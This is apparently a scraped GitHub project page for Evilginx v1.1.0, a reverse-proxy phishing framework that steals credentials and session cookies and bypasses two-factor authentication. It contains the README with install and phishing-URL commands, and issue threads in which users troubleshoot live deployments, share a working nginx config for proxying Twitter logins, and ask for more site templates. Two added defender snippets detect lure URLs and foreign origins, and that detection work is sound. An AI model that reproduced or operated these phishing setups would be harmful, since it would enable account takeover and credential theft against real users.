evilginx's Introduction

Evilginx v.1.1.0

THIS VERSION IS OBSOLETE. PLEASE USE THE LATEST VERSION!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which uses proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.

You can learn how it works and how to install everything yourself on my blog:

First post slightly outdated now: Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 Update: Evilginx 1.1 Update

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Contributors Hall of Fame

@poweroftrue

Installation

Evilginx provides an installation script, install.sh, that takes care of installing the whole package on any Debian wheezy/jessie machine in a fire-and-forget manner.

git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Usage

            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit

Setup

Enable or disable site configurations for use with the Nginx server, using the supplied Evilginx templates from the sites directory.

usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Enable google phishing site with preregistered phishing domain not-really-google.com:

python evilginx.py setup --enable google -d not-really-google.com

Disable facebook phishing site:

python evilginx.py setup --disable facebook

Parse

Parse Nginx logs to extract intercepted login credentials and session cookies. By default, logs are saved in the logs directory, next to the evilginx.py script. Parsing can run automatically once you enable auto-parsing in the Setup phase.

usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python evilginx.py parse -s google

Parse logs for all available sites:

python evilginx.py parse -s all

Generate URL

Generate phishing URLs that you can use in your Red Team Assessments.

usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Generate a google phishing URL that will redirect the victim to a Rickroll video on successful login:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
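
A defender-side check for the lure format shown in the genurl output above, as an added example that is not part of Evilginx or its README: it scans log lines for URLs whose rc parameter decodes to a redirect URL on a host outside an allowlist. The rc layout (one leading character, then unpadded URL-safe base64) is inferred from the sample URLs on this page; LEGIT_HOSTS, the function names and the log lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Paths taken from the two sample URLs in the genurl output above.
LOGIN_PATHS = {"/ServiceLogin", "/signin/v2/identifier"}
# Assumption: hosts that legitimately serve those paths for the watched brand.
LEGIT_HOSTS = {"accounts.google.com"}

B64URL = re.compile(r"[A-Za-z0-9_-]+")
URL_IN_LINE = re.compile(r"https?://[^\s\"']+")

# Constructed proxy-log lines (not real traffic). The first two carry the
# README's sample URLs; the rest exercise the negative and edge cases.
SAMPLE_LOG = [
    "2017-06-12T09:13:01Z 10.0.0.15 GET https://accounts.not-really-google.com/ServiceLogin"
    "?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ 200",
    "2017-06-12T09:13:04Z 10.0.0.15 GET https://accounts.not-really-google.com/signin/v2/identifier"
    "?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ 200",
    "2017-06-12T09:14:10Z 10.0.0.22 GET https://accounts.google.com/ServiceLogin"
    "?continue=https%3A%2F%2Fmail.google.com%2F 200",
    "2017-06-12T09:15:30Z 10.0.0.31 GET https://shop.example.com/list?rc=12&page=3 200",
    "2017-06-12T09:16:45Z 10.0.0.40 GET https://news.example.org/go?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ 302",
]


def decode_rc(value):
    """Return the redirect URL carried in an rc value, or None if it is not one."""
    body = value[1:]  # drop the single leading character seen in the samples
    if not body or not B64URL.fullmatch(body):
        return None
    body += "=" * (-len(body) % 4)  # restore the padding the lure omits
    try:
        decoded = base64.urlsafe_b64decode(body).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.startswith(("http://", "https://")) else None


def check_url(url):
    """Return a finding dict for a suspected lure URL, else None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in LEGIT_HOSTS:
        return None
    for value in parse_qs(parts.query).get("rc", []):
        redirect = decode_rc(value)
        if redirect is not None:
            return {
                "host": host,
                "path": parts.path,
                "redirect": redirect,
                # True when the path also imitates a known sign-in page.
                "login_path": parts.path in LOGIN_PATHS,
            }
    return None


def scan(lines):
    """Check every URL found in the given log lines; return the findings in order."""
    findings = []
    for line in lines:
        for url in URL_IN_LINE.findall(line):
            finding = check_url(url)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        level = "HIGH" if f["login_path"] else "REVIEW"
        print(f"{level:6} {f['host']}{f['path']} -> {f['redirect']}")
```

A hit on a sign-in path is the stronger signal; an rc value that decodes to a URL on an unrelated path is worth a look but may be another application's own parameter.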

evilginx's Issues

How can I protect my websites from this?

@kgretzky thanks for your amazing works!

I have many websites, in many technologies... I need a way to protect them.

I'm wondering if there is just something like a check of suspicious IP activities in the aftermath?

Just this? Really?

Can I check my SSL certificate? HSTS? Avoid serving my site if called from evilnginx?

CSRF protection helps in any way?

Cookies

Cookies are not captured from smartphones.
The rt cookie is only for web browsers.
Is there any way to get cookies from smartphone devices too?

Error enabling site config.

Connection refused obtaining SSL certificates: PLEASE HELP!!

root@kali:~/Desktop/tools/evilginx# python evilginx.py setup --enable google -d authconfig-gogle.site
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: authconfig-gogle.site
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:

  • authconfig-gogle.site
  • accounts.authconfig-gogle.site
  • ssl.authconfig-gogle.site
    Saving debug log to /var/log/letsencrypt/letsencrypt.log
    Plugins selected: Authenticator standalone, Installer None
    Obtaining a new certificate
    Performing the following challenges:
    tls-sni-01 challenge for authconfig-gogle.site
    tls-sni-01 challenge for accounts.authconfig-gogle.site
    tls-sni-01 challenge for ssl.authconfig-gogle.site
    Waiting for verification...
    Cleaning up challenges
    Failed authorization procedure. accounts.authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused, ssl.authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused, authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused

IMPORTANT NOTES:

  • The following errors were reported by the server:

    Domain: accounts.authconfig-gogle.site
    Type: connection
    Detail: Connection refused

    Domain: ssl.authconfig-gogle.site
    Type: connection
    Detail: Connection refused

    Domain: authconfig-gogle.site
    Type: connection
    Detail: Connection refused

    To fix these errors, please make sure that your domain name was
    entered correctly and the DNS A/AAAA record(s) for that domain
    contain(s) the right IP address. Additionally, please check that
    your computer has a publicly routable IP address and that no
    firewalls are preventing the server from communicating with the
    client. If you're using the webroot plugin, you should also verify
    that you are serving files from the webroot path you provided.
    [-] Failed to obtain certificates.
    [?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
    [*] Starting nginx daemon...

Failed to start Nginx daemon

Installing Evilginx daemon...

Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl  status nginx.service" and "journalctl  -xe" for details.
[-] Failed to start Nginx daemon.
systemctl  status nginx.service
● nginx.service - The NGINX HTTP and reverse proxy server
   Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
   Active: failed (Result: exit-code) since Thu 2017-10-12 15:54:09 EDT; 34s ago
      CPU: 3ms

Oct 12 15:54:09 aidan-laptop systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_au
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 12 15:54:09 aidan-laptop systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Unit entered failed state.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Failed with result 'exit-code'.

Help please, running using Kali GNU/Linux Rolling

Parsing problem

Hi there,
I'm using your awesome tool to create a dropbox-like site. I set up the site and generate a URL, I navigate to the URL, log on, and get redirected (using Edge browser) to the site I specified (all cool so far).
When I try to parse the logs, I get this:

Parsing logs for site 'dropbox'...
[*] Debug mode on. Log was not truncated!
[+] Found creds: 0
[+] Found tokens: 0
In /var/log/ evilginx-dropbox.log is empty.
But if I go to /evilginx/logs/dropbox I can see the file created, 20170612_091301_0_tokens.txt, and the password is actually there.

Just tried with Facebook, with same results.

Twitter Config

Hi there,

Awesome project you got going on here!

I've been trying to setup a config for Twitter and I'm having a little trouble. I wanted to start small so right now the focus is to just capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie / ssl related.

My config at the moment is this.

log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
	proxy_pass https://twitter.com/;
	proxy_cookie_domain twitter.com 192.168.60.133;
	proxy_redirect https://twitter.com/ 192.168.60.133/;
	
	sub_filter 'https://twitter.com/' '192.168.60.133/';
	sub_filter_once off;
	sub_filter_types *;

	proxy_set_header Accept-Encoding "";
	proxy_set_header X-Real-IP $remote_addr;
	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

	access_log /var/log/evilginx-twitter.log twitter_phish;
}

As you've probably noticed, I don't have a domain setup yet so I'm using a VM's IP to substitute.

I can successfully proxy Twitter. The error happens after I try to login. A request is sent to https://twitter.com/sessions to validate the form data and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions and that is what I see in my address bar.

I think I might be using the sub_filter directive incorrectly or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions or am I not doing something right?

Regards

evilginx_parser

python /root/tools/evilginx/evilginx_parser.py -i /var/log/evilginx-google.log -o /tmp/logs -c google.creds -x
[-] creds config corrupted.

error when running evilginx.py

Just installed evilginx and when i try to run it i get this error:

screenshot from 2017-08-16 02-22-50

I can tell that i am missing some files, can you help me fix this please?

live config

Hello, thank you for the really helpful update. There is a problem with login.live.com. I tried many things, but as you can see we have some problems in the headers that the proxy sends to live.com.
This is what the proxy sends:

OPTIONS https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Access-Control-Request-Method: POST
Origin: http://login.fakelive.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Access-Control-Request-Headers: content-type, hpgact, hpgid
Accept: */*
Referer: http://login.fakelive.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

And this is what live.com sends itself:

POST https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Content-Length: 130
hpgid: 0
Accept: application/json
Origin: https://login.live.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
hpgact: 0
Content-type: application/json; charset=UTF-8
Referer: https://login.live.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: uaid=***; MSPRequ=lt=***&co=1&id=N; MSPOK=***; CkTst=***

{"username":"@outlook.com","uaid":"","isOtherIdpSupported":false,"checkPhones":true}

There are some problems, like the request being sent as an OPTIONS, not a POST. Also, some headers and the body are missing. Do you have any idea?
thanks a lot
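
Seen from the site owner's side, the two captures in the post above differ in ways a sign-in endpoint can log and alert on; the following is an added example, not part of the original post or of Evilginx, that flags a request whose Origin or Referer names a host other than the one in its Host header. The function names and the treatment of a CORS preflight as a signal (on the assumption that the endpoint is only ever called same-origin) are illustrative; the sample requests are constructed from the post's captures, trimmed to the relevant headers.

```python
from urllib.parse import urlsplit

# Constructed from the two captures quoted in the post, trimmed for brevity.
VIA_PROXY = """OPTIONS https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Access-Control-Request-Method: POST
Origin: http://login.fakelive.com
Access-Control-Request-Headers: content-type, hpgact, hpgid
Referer: http://login.fakelive.com/
"""

DIRECT = """POST https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Origin: https://login.live.com
Content-type: application/json; charset=UTF-8
Referer: https://login.live.com/
"""


def parse_head(raw):
    """Split a raw HTTP/1.1 request head into (method, target, headers)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def foreign_origin_findings(raw):
    """Return (header, reason, value) tuples for a request to a sign-in endpoint."""
    method, _target, headers = parse_head(raw)
    expected = headers.get("host", "").split(":")[0].lower()
    findings = []
    for name in ("origin", "referer"):
        value = headers.get(name)
        if not value:
            continue
        parts = urlsplit(value)
        host = (parts.hostname or "").lower()
        if host != expected:
            findings.append((name, "foreign-host", host))
        if parts.scheme != "https":
            findings.append((name, "not-https", parts.scheme))
    # Assumption: this endpoint is only called from its own origin, so a
    # preflight means a page on another origin is trying to reach it.
    if method == "OPTIONS" and "access-control-request-method" in headers:
        findings.append(("method", "cors-preflight",
                         headers["access-control-request-method"]))
    return findings


if __name__ == "__main__":
    for label, raw in (("via proxy", VIA_PROXY), ("direct", DIRECT)):
        print(label, foreign_origin_findings(raw) or "clean")
```

These headers can be altered in transit, so treat a hit as a detection signal for logging and alerting rather than as an access control.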

syntax error near unexpected token

I follow all the necessary steps, but at the point when I try to enable nginx I get this -

systemctl enable nginx

Loaded: error (Reason: Bad message)

-bash: syntax error near unexpected token `('
root@googlegoogIe:~# systemctl enable nginx
Failed to execute operation: Bad message

systemctl start nginx
Failed to start nginx.service: Unit nginx.service failed to load: Bad message. See system logs and 'systemctl status nginx.service' for details.

systemctl status nginx.service

● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: error (Reason: Bad message)
Active: inactive (dead)

How to fix this?

new Google sign-in page

The new Google sign-in page shows up on computers, phones, and tablets.
Now when you try to log in through evilginx, it is still waiting for something...
This morning it still worked, now... no :/
I will check later if changes are required in the nginx config, for example in the proxy_pass.

screen shot 2017-05-02 at 14 49 40

Thanks

nginx not getting started

[/etc/systemd/system/nginx.service:16] Missing

When trying to enable and start the nginx service, I am getting the above error.

Google phishing detection

Hi @kgretzky
Great project!
Quick question: Won't this trigger Google Chrome's phishing detection if opened with Chrome (with usage statistics, etc., enabled)?

Several errors.

Hi bro, great job on this project. Sadly i am facing some problems, i get SSL verification errors, and when i create a link, the link, it says server not found. Here i got some screenshots of the errors, maybe you can help me. Keep the good job up!

screenshot from 2017-05-24 22-52-05
screenshot from 2017-05-24 22-52-47
screenshot from 2017-05-24 22-53-13
screenshot from 2017-05-24 22-53-45

Tutorial

Hello!
Thank you for the amazing tool you are sharing with the world for free, you are doing an amazing job!
The only problem is, there are no tutorials / guides at ALL on how to use the tool. If you do not have coding knowledge, it will be almost impossible to use. There is a short documentation on how to install it, but no documentation on, for example, TOR browser support, .onion sites support, how to configure it, how to build a new config, etc. Please take this into consideration, a lot of people cannot really use it because of lack of knowledge.

Thank you.

RC / RT should not be readable for the victim

If you send out a link for phishing, this link should consist of a domain and an ID at most:

http://my-site.com/ServiceLogin?id=1234567890

The RC and RT should be mapped in the backend to a unique ID and not presented to the victim, as this is minimizing the success rate drastically if you see a URL like this:

http://my-site.com/ServiceLogin?rc=http://my-real-site.com/login&rt=Session

zlib library not found

Please can you explain to me why I keep getting this error when I run ./install.sh on terminal and how can I fix it?

/configure: error: the HTTP gzip module requires the zlib library.
You can either disable the module by using --without-http_gzip_module
option, or install the zlib library into the system, or build the zlib library
statically from the source with nginx by using --with-zlib= option.

ERROR: failed to run command: sh ./configure --prefix=/etc/nginx/nginx ...
[-] Failed to configure openresty installation.

I will really appreciate your quick response. Thanks in anticipation.

cant access generated url

i am noob so please help me learn
i enabled google with domain yourjjjgoogle.com
and the generated url for youtube.com
here is what i did on terminal after installing evilginx

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...
evilginx.py: error: too few arguments
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py-h
python: can't open file 'evilginx.py-h': [Errno 2] No such file or directory
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py -h
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
                         [--use_letsencrypt] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup -d google
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
                         [--use_letsencrypt] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourgoogle.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: yourgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] Y
[*] Getting SSL/TLS certificates for following domains:
 - yourgoogle.com
 - accounts.yourgoogle.com
 - ssl.yourgoogle.com
Bootstrapping dependencies for Debian-based OSes... (you can skip this with --no-bootstrap)
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
gcc is already the newest version.
python is already the newest version.
python-dev is already the newest version.
augeas-lenses is already the newest version.
ca-certificates is already the newest version.
libaugeas0 is already the newest version.
libffi-dev is already the newest version.
libssl-dev is already the newest version.
openssl is already the newest version.
python-virtualenv is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 738 not upgraded.
Creating virtual environment...
Installing Python packages...
Installation succeeded.
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Registering without email!
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for yourgoogle.com
http-01 challenge for accounts.yourgoogle.com
http-01 challenge for ssl.yourgoogle.com
Cleaning up challenges
Problem binding to port 80: Could not bind to IPv4 or IPv6.

IMPORTANT NOTES:
 - Your account credentials have been saved in your Certbot
   configuration directory at /etc/letsencrypt. You should make a
   secure backup of this folder now. This configuration directory will
   also contain certificates and private keys obtained by Certbot so
   making regular backups of this folder is ideal.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] y
[+] Setting all SSL/TLS certificates to be auto-renewed via /etc/crontab.
[*] Starting nginx daemon...

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

Generated following phishing URLs:

 : https://accounts.yourgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
 : https://accounts.yourgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourjjjgoogle.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: yourjjjgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] N
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] N
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] N
[*] Starting nginx daemon...

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

Generated following phishing URLs:

 : https://accounts.yourjjjgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
 : https://accounts.yourjjjgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ

root@pulkitserver:/home/pulkit/Desktop/evilginx# 

Credentials not Parsed

Hi, I have successfully phished the user and I have got the user credentials and session tokens, but when I try to parse them I get this error:
2017-06-13 17_57_32-root ip-172-31-18-22_ _home_ubuntu_evilginx
I have both the credentials and session token files in the Linkedin logs directory.

Compile error using latest OpenSSL

I get this error while compiling with the latest version of OpenSSL

src/event/ngx_event_openssl.c: In function ‘ngx_ssl_connection_error’:
src/event/ngx_event_openssl.c:2048:21: error: ‘SSL_R_NO_CIPHERS_PASSED’ undeclared (first use in this function)
    || n == SSL_R_NO_CIPHERS_PASSED /* 182 */
            ^~~~~~~~~~~~~~~~~~~~~~~
src/event/ngx_event_openssl.c:2048:21: note: each undeclared identifier is reported only once for each function it appears in
objs/Makefile:1092: recipe for target 'objs/src/event/ngx_event_openssl.o' failed
make[2]: *** [objs/src/event/ngx_event_openssl.o] Error 1

Version of OpenSSL:
Package: libssl-dev
Source: openssl
Version: 1.1.0e-1

Is there any way I can compile using the older version which is supported?

not working

I set up evilginx smoothly. I have the nginx server actively running. I was testing it on my remote desktop server, but when I run the setup of the weblink (e.g. google) and genurl, it generates the URL. When I click it, it shows an empty page not found. I use a VPS with the native IP of the VPS. For testing, when I open the link on my local VMware, it shows an empty error page.

Yahoo support

Hi,

Would appreciate if you can add a yahoo config to the templates.

Can you also do a tutorial on adding our own configs for sites?

Getting evilginx working on Kali Linux

Hi there, I just wanted to share my way of trying to install evilginx on Kali Linux: what I have overcome and what I am still having problems with.

Issues:

  1. Lack of zlib library
    solution: apt install zlib1g-dev
  2. Location and then versions of the modules (prevents nginx from starting)

    root@kali:~/evilginx# systemctl status nginx.service
    ● nginx.service - The NGINX HTTP and reverse proxy server
    Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
    Active: failed (Result: exit-code) since Sun 2017-10-15 12:31:22 EDT; 15s ago
    Process: 25771 ExecStartPre=/usr/sbin/nginx -t (code=exited, status=1/FAILURE)

    Oct 15 12:31:22 kali systemd[1]: Starting The NGINX HTTP and reverse proxy server...
    Oct 15 12:31:22 kali nginx[25771]: nginx: [emerg] module "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" version 1013005 instead of 1011002 in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
    Oct 15 12:31:22 kali nginx[25771]: nginx: configuration file /etc/nginx/nginx.conf test failed
    Oct 15 12:31:22 kali systemd[1]: nginx.service: Control process exited, code=exited status=1
    Oct 15 12:31:22 kali systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
    Oct 15 12:31:22 kali systemd[1]: nginx.service: Unit entered failed state.
    Oct 15 12:31:22 kali systemd[1]: nginx.service: Failed with result 'exit-code'.

    solution: At first I just searched for the missing modules and made symbolic links to where nginx was looking for them, but as you can see that didn't solve the problem, as after the links were created a module version issue occurred :/ I tried to check nginx.conf for any suggestions of module version validation and how to disable it, but failed. Any suggestions? (Sorry for mistakes, this is my first post)

js and css files showing as html

First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However, I'm having a lot of trouble getting things working for a custom target. The target page is getting served when I visit the phishing domain like it should, but any CSS or JS files are not; for some reason the same login page is being served for each JS or CSS file.
Here are my config and site.conf files:

config


[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]

site.conf

log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';

server {
	listen 80;
	listen 443 ssl;
	
